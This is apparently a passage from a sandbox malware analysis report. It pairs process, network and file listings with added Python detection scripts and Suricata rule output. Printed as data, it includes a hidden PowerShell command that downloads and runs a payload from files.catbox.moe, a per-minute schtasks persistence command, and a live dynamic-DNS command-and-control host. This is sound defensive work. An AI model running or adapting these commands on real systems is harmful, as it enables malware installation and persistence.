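The process listing above carries the three command lines that matter for detection: the PowerShell cradle (-NoP -EP Bypass -W Hidden, iwr to %TEMP%\MasonKit.com, then Start-Process on it), the schtasks /create that reruns C:\Users\Admin\AppData\Roaming\x69.exe every minute, and two images with non-.exe extensions (MasonKit.com, MasonR.bat) executed directly from %TEMP%. The following is an added example for this report, not sandbox or vendor code: it reads the listing in the format printed here (image path, blank line, command line; a subset of the section above) and applies three rules that a SOC would run over process-creation telemetry. The regexes and the "user profile" heuristic are the author's assumptions.

```python
"""Triage command lines from a sandbox process listing.
Added example, not sandbox or vendor code. PROCESS_LIST is a subset of the
Processes section above (image path, blank line, command line). The rules and
the user-profile heuristic are the author's assumptions."""
import re

PROCESS_LIST = r"""
C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Users\Admin\AppData\Local\Temp\x69.exe

"C:\Users\Admin\AppData\Local\Temp\x69.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -EP Bypass -W Hidden -C "iwr 'https://files.catbox.moe/8ruqew.rar' -OutFile $env:TEMP\MasonKit.com; Start-Process -WindowStyle Hidden $env:TEMP\MasonKit.com"

C:\Users\Admin\AppData\Local\Temp\MasonKit.com

"C:\Users\Admin\AppData\Local\Temp\MasonKit.com"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"

C:\Users\Admin\AppData\Local\Temp\MasonR.bat

"C:\Users\Admin\AppData\Local\Temp\MasonR.bat"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{742a7f0f-e5c2-4a52-b3bb-c750adbe5391}
"""

# PowerShell switches and cmdlets that together make a download cradle (assumption).
PS_INDICATORS = [
    (re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?\b"), "NoProfile"),
    (re.compile(r"(?i)-e(?:xecutionpolicy|p)\s+bypass"), "ExecutionPolicy Bypass"),
    (re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), "hidden window"),
    (re.compile(r"(?i)\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|start-bitstransfer)\b"), "download cradle"),
    (re.compile(r"(?i)\b(?:start-process|iex|invoke-expression)\b"), "runs fetched content"),
]
SCHTASKS_CREATE = re.compile(r'(?i)schtasks(?:\.exe)?"?\s+/create')
SCHTASKS_TR = re.compile(r'(?i)/tr\s+"?([^"]+?)"?(?:\s|$)')
SCHTASKS_SC = re.compile(r"(?i)/sc\s+(\w+)(?:\s+/mo\s+(\d+))?")


def basename(path):
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def in_user_dir(path):
    p = path.lower()
    return "\\users\\" in p and "\\appdata\\" in p


def parse_process_list(text):
    """Pair each image path with the command line that follows it (report layout)."""
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    return list(zip(lines[0::2], lines[1::2]))


def rule_powershell_cradle(image, cmd):
    if basename(image) not in ("powershell.exe", "pwsh.exe"):
        return None
    hits = [label for rx, label in PS_INDICATORS if rx.search(cmd)]
    if "download cradle" in hits and len(hits) >= 3:
        return "PowerShell download cradle: " + ", ".join(hits)
    return None


def rule_schtasks_persistence(image, cmd):
    if not SCHTASKS_CREATE.search(cmd):
        return None
    tr, sc = SCHTASKS_TR.search(cmd), SCHTASKS_SC.search(cmd)
    target = tr.group(1) if tr else "?"
    reasons = []
    if in_user_dir(target):
        reasons.append(f"runs {target} from the user profile")
    if sc and sc.group(1).lower() == "minute" and (sc.group(2) or "1") == "1":
        reasons.append("fires every minute")
    return "schtasks persistence: " + "; ".join(reasons) if reasons else "schtasks /create"


def rule_masquerading_extension(image, cmd):
    # A PE renamed to .com/.bat still runs as its own process image.
    if in_user_dir(image) and not image.lower().endswith(".exe"):
        return f"non-.exe image launched from user profile: {basename(image)}"
    return None


RULES = (rule_powershell_cradle, rule_schtasks_persistence, rule_masquerading_extension)


def triage(pairs):
    """Return (image basename, verdict) for every rule that fires, in listing order."""
    findings = []
    for image, cmd in pairs:
        for rule in RULES:
            verdict = rule(image, cmd)
            if verdict:
                findings.append((basename(image), verdict))
    return findings


if __name__ == "__main__":
    for name, verdict in triage(parse_process_list(PROCESS_LIST)):
        print(f"{name:16} {verdict}")
```

The schtasks rule deliberately keys on the combination of a one-minute trigger and a user-profile target rather than on the task name: the /tn "x69" string is specific to this sample, while the trigger and path pattern recur across droppers. The /Processid GUID on dllhost.exe is left alone here; the report itself only records what was written into that process, not what the CLSID resolves to.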

Network

Country Destination Domain Proto
US 8.8.8.8:53 files.catbox.moe udp
US 108.181.20.35:443 files.catbox.moe tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 grayhatgroupontop.zapto.org udp
EG 197.160.170.172:1177 grayhatgroupontop.zapto.org tcp
GB 2.18.27.76:443 www.bing.com tcp
EG 197.160.170.172:1177 grayhatgroupontop.zapto.org tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
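Of the rows above, only two connections are the sample's own: the HTTPS fetch from files.catbox.moe (the host named in the PowerShell command line) and the repeated TCP sessions to 197.160.170.172:1177 under the dynamic-DNS name grayhatgroupontop.zapto.org. The Bing traffic is background noise from the Windows image. The script below is an added example for this report, not sandbox or vendor code: it parses the network table in the format printed here, separates resolver lookups from connections, drops an allowlist of sandbox background domains, tags the remaining destinations (dynamic-DNS suffix, non-standard port, host known from the download cradle) and emits a Suricata rule for each. The allowlist and the dynamic-DNS suffix list are the author's assumptions.

```python
"""Extract and tag network IOCs from a sandbox 'Country Destination Domain Proto' table
and emit Suricata rules for the flagged destinations.
Added example, not sandbox or vendor code. NET_ROWS is copied from the table above;
ALLOWLIST_SUFFIXES and DDNS_SUFFIXES are the author's assumptions."""
import ipaddress

NET_ROWS = """
US 8.8.8.8:53 files.catbox.moe udp
US 108.181.20.35:443 files.catbox.moe tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 grayhatgroupontop.zapto.org udp
EG 197.160.170.172:1177 grayhatgroupontop.zapto.org tcp
GB 2.18.27.76:443 www.bing.com tcp
EG 197.160.170.172:1177 grayhatgroupontop.zapto.org tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
"""
# Background traffic of the sandbox's Windows image (assumption).
ALLOWLIST_SUFFIXES = (".bing.com", ".bing.net")
# Free dynamic-DNS providers commonly used for C2 hostnames (assumption).
DDNS_SUFFIXES = (".zapto.org", ".no-ip.org", ".ddns.net", ".hopto.org", ".duckdns.org")


def parse_network(text):
    """One dict per row; the IP is validated so a garbled row fails loudly."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or ":" not in parts[1]:
            continue
        country, dest, domain, proto = parts
        ip, port = dest.rsplit(":", 1)
        conns.append({"country": country, "ip": str(ipaddress.ip_address(ip)),
                      "port": int(port), "domain": domain.lower(), "proto": proto.lower()})
    return conns


def queried_domains(conns):
    """Names sent to the resolver, whether or not a connection followed."""
    return sorted({c["domain"] for c in conns if c["port"] == 53})


def classify(conns, download_hosts=frozenset()):
    """Tag non-allowlisted connections; download_hosts come from the command line."""
    findings, seen = [], set()
    for c in conns:
        if c["port"] == 53 or c["domain"].endswith(ALLOWLIST_SUFFIXES):
            continue
        tags = []
        if c["domain"] in download_hosts:
            tags.append("payload-download")
        if c["domain"].endswith(DDNS_SUFFIXES):
            tags.append("dynamic-dns")
        if c["proto"] == "tcp" and c["port"] not in (80, 443):
            tags.append("non-standard-port")
        key = (c["ip"], c["port"], c["domain"])
        if tags and key not in seen:
            seen.add(key)
            findings.append({**c, "tags": tags})
    return findings


def suricata_rule(finding, sid):
    """Destination IP/port rule; pair it with a DNS rule on the domain for rotation."""
    msg = f"Sandbox IOC {finding['domain']} ({', '.join(finding['tags'])})"
    return (f"alert {finding['proto']} $HOME_NET any -> {finding['ip']} {finding['port']} "
            f'(msg:"{msg}"; flow:to_server; sid:{sid}; rev:1;)')


if __name__ == "__main__":
    conns = parse_network(NET_ROWS)
    print("queried:", queried_domains(conns))
    for i, f in enumerate(classify(conns, {"files.catbox.moe"}), start=1000001):
        print(suricata_rule(f, i))
```

Blocking 197.160.170.172 alone is a short-lived control: the point of a dynamic-DNS hostname is that the operator can repoint it, so the domain should be sunk at the resolver as well, and the port 1177 destination should be watched as a pattern rather than as a single IP.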

Files

memory/380-0-0x00007FFA58873000-0x00007FFA58875000-memory.dmp

memory/380-1-0x0000000000770000-0x0000000000782000-memory.dmp

memory/1700-2-0x0000017569BD0000-0x0000017569BF2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z4ivcmjw.vrb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1700-12-0x00007FFA58870000-0x00007FFA59331000-memory.dmp

memory/1700-13-0x00007FFA58870000-0x00007FFA59331000-memory.dmp

memory/1700-14-0x00007FFA58870000-0x00007FFA59331000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MasonKit.com

MD5 cc08b88c7b9ef35411f7ad9b8952d390
SHA1 315c2052a1d8eefc76df94b8fa7b52c037d2ea98
SHA256 83c839ff8e487d87992434bd395fb610ce6238c673c4e798724f2a34b6bb68d4
SHA512 74c74b03f2c9d14bff1ddcd9259fa58405f7f6f0f50f09d240c131e4258be4046a745ef918861ec0ccc8f6533008473d71c9f1c43b6805b8fa8fec403a12ee24

memory/5688-22-0x00000000001E0000-0x000000000027E000-memory.dmp

memory/5688-23-0x00000000022E0000-0x0000000002378000-memory.dmp

memory/1700-26-0x00007FFA58870000-0x00007FFA59331000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MasonR.bat

MD5 ae78843b23f7a1c65f6b9a5a031f1950
SHA1 a12aad340d3eafb919d6cf38fad402f29b570ed0
SHA256 8de8fd340cd8057899781e8796f36543092cdfa9028958102bd5fec9f2070447
SHA512 648e6f7eeadf9d1ab2ba36311259a20f5b55c16a04a271fe7e7f3ee166e626aea6c6d97e9e5b4f8c9d1d997ab1444bcd1ff5dfa61bd9f1b988c58e30d40dc3b5

memory/3160-33-0x0000023605B20000-0x0000023605BBA000-memory.dmp

memory/3160-35-0x00007FFA74D40000-0x00007FFA74DFE000-memory.dmp

memory/3160-34-0x00007FFA76910000-0x00007FFA76B05000-memory.dmp

memory/4812-38-0x0000000140000000-0x00000001401A1000-memory.dmp

memory/4812-40-0x00007FFA74D40000-0x00007FFA74DFE000-memory.dmp

memory/4812-36-0x0000000140000000-0x00000001401A1000-memory.dmp

memory/380-41-0x00007FFA58870000-0x00007FFA59331000-memory.dmp

memory/4812-39-0x00007FFA76910000-0x00007FFA76B05000-memory.dmp

memory/668-57-0x0000025072400000-0x00000250725BB000-memory.dmp

memory/668-59-0x00007FFA36990000-0x00007FFA369A0000-memory.dmp

memory/376-68-0x00007FFA36990000-0x00007FFA369A0000-memory.dmp

memory/948-75-0x00007FFA36990000-0x00007FFA369A0000-memory.dmp

memory/1028-95-0x000001777C340000-0x000001777C4FB000-memory.dmp

memory/1100-99-0x0000024F80D40000-0x0000024F80EFB000-memory.dmp

memory/1028-96-0x00007FFA36990000-0x00007FFA369A0000-memory.dmp

memory/1028-94-0x000001777C340000-0x000001777C4FB000-memory.dmp

memory/1028-93-0x000001777C340000-0x000001777C4FB000-memory.dmp

memory/1028-92-0x000001777C340000-0x000001777C4FB000-memory.dmp

memory/1028-91-0x000001777C340000-0x000001777C4FB000-memory.dmp

memory/540-83-0x00007FFA36990000-0x00007FFA369A0000-memory.dmp

memory/540-82-0x0000027212880000-0x0000027212A3B000-memory.dmp

memory/540-81-0x0000027212880000-0x0000027212A3B000-memory.dmp

memory/540-80-0x0000027212880000-0x0000027212A3B000-memory.dmp

memory/540-79-0x0000027212880000-0x0000027212A3B000-memory.dmp

memory/540-78-0x0000027212880000-0x0000027212A3B000-memory.dmp

memory/1100-98-0x0000024F80D40000-0x0000024F80EFB000-memory.dmp

memory/948-74-0x000001B1CAEE0000-0x000001B1CB09B000-memory.dmp

memory/948-73-0x000001B1CAEE0000-0x000001B1CB09B000-memory.dmp

memory/948-72-0x000001B1CAEE0000-0x000001B1CB09B000-memory.dmp

memory/948-71-0x000001B1CAEE0000-0x000001B1CB09B000-memory.dmp

memory/948-70-0x000001B1CAEE0000-0x000001B1CB09B000-memory.dmp

memory/376-67-0x000002BC81DE0000-0x000002BC81F9B000-memory.dmp

memory/376-66-0x000002BC81DE0000-0x000002BC81F9B000-memory.dmp

memory/376-64-0x000002BC81DE0000-0x000002BC81F9B000-memory.dmp

memory/376-63-0x000002BC81DE0000-0x000002BC81F9B000-memory.dmp

memory/668-58-0x0000025072400000-0x00000250725BB000-memory.dmp

memory/668-56-0x0000025072400000-0x00000250725BB000-memory.dmp

memory/668-55-0x0000025072400000-0x00000250725BB000-memory.dmp

memory/668-54-0x0000025072400000-0x00000250725BB000-memory.dmp

memory/616-51-0x00007FFA36990000-0x00007FFA369A0000-memory.dmp

memory/616-50-0x000001BAE18E0000-0x000001BAE1A9B000-memory.dmp

memory/616-49-0x000001BAE18E0000-0x000001BAE1A9B000-memory.dmp

memory/616-48-0x000001BAE18E0000-0x000001BAE1A9B000-memory.dmp

memory/376-65-0x000002BC81DE0000-0x000002BC81F9B000-memory.dmp

memory/616-46-0x000001BAE18E0000-0x000001BAE1A9B000-memory.dmp

memory/616-45-0x000001BADFD10000-0x000001BADFE4E000-memory.dmp

memory/616-47-0x000001BAE18E0000-0x000001BAE1A9B000-memory.dmp

memory/4812-42-0x0000000140000000-0x00000001401A1000-memory.dmp

memory/380-614-0x00007FFA58873000-0x00007FFA58875000-memory.dmp

C:\Users\Admin\AppData\Roaming\x69.exe

MD5 c1ade7728d9871043141fde331aebcf2
SHA1 c9ebed22e028ff8d2e05dea75f04b2e4ca692d17
SHA256 8ead895e1e76dc258954703305da5eed934eb7744eddf4d1b481c70fddefcef6
SHA512 97a03bd5194a436b58a01348947cfe3793fac65b5d8b3bb70ce30240d3522ea44f7713548373fcae40f979693e879bef69a72202e3f8fc29f3d731a058b7f6ba

memory/3984-656-0x0000000000F50000-0x0000000000F62000-memory.dmp

memory/380-659-0x00007FFA58870000-0x00007FFA59331000-memory.dmp

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 1e8e2076314d54dd72e7ee09ff8a52ab
SHA1 5fd0a67671430f66237f483eef39ff599b892272
SHA256 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA512 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 0b990e24f1e839462c0ac35fef1d119e
SHA1 9e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256 a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512 c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1 a3879621f9493414d497ea6d70fbf17e283d5c08
SHA256 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA512 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 7d612892b20e70250dbd00d0cdd4f09b
SHA1 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512 f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 f313c5b4f95605026428425586317353
SHA1 06be66fa06e1cffc54459c38d3d258f46669d01a
SHA256 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512 b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890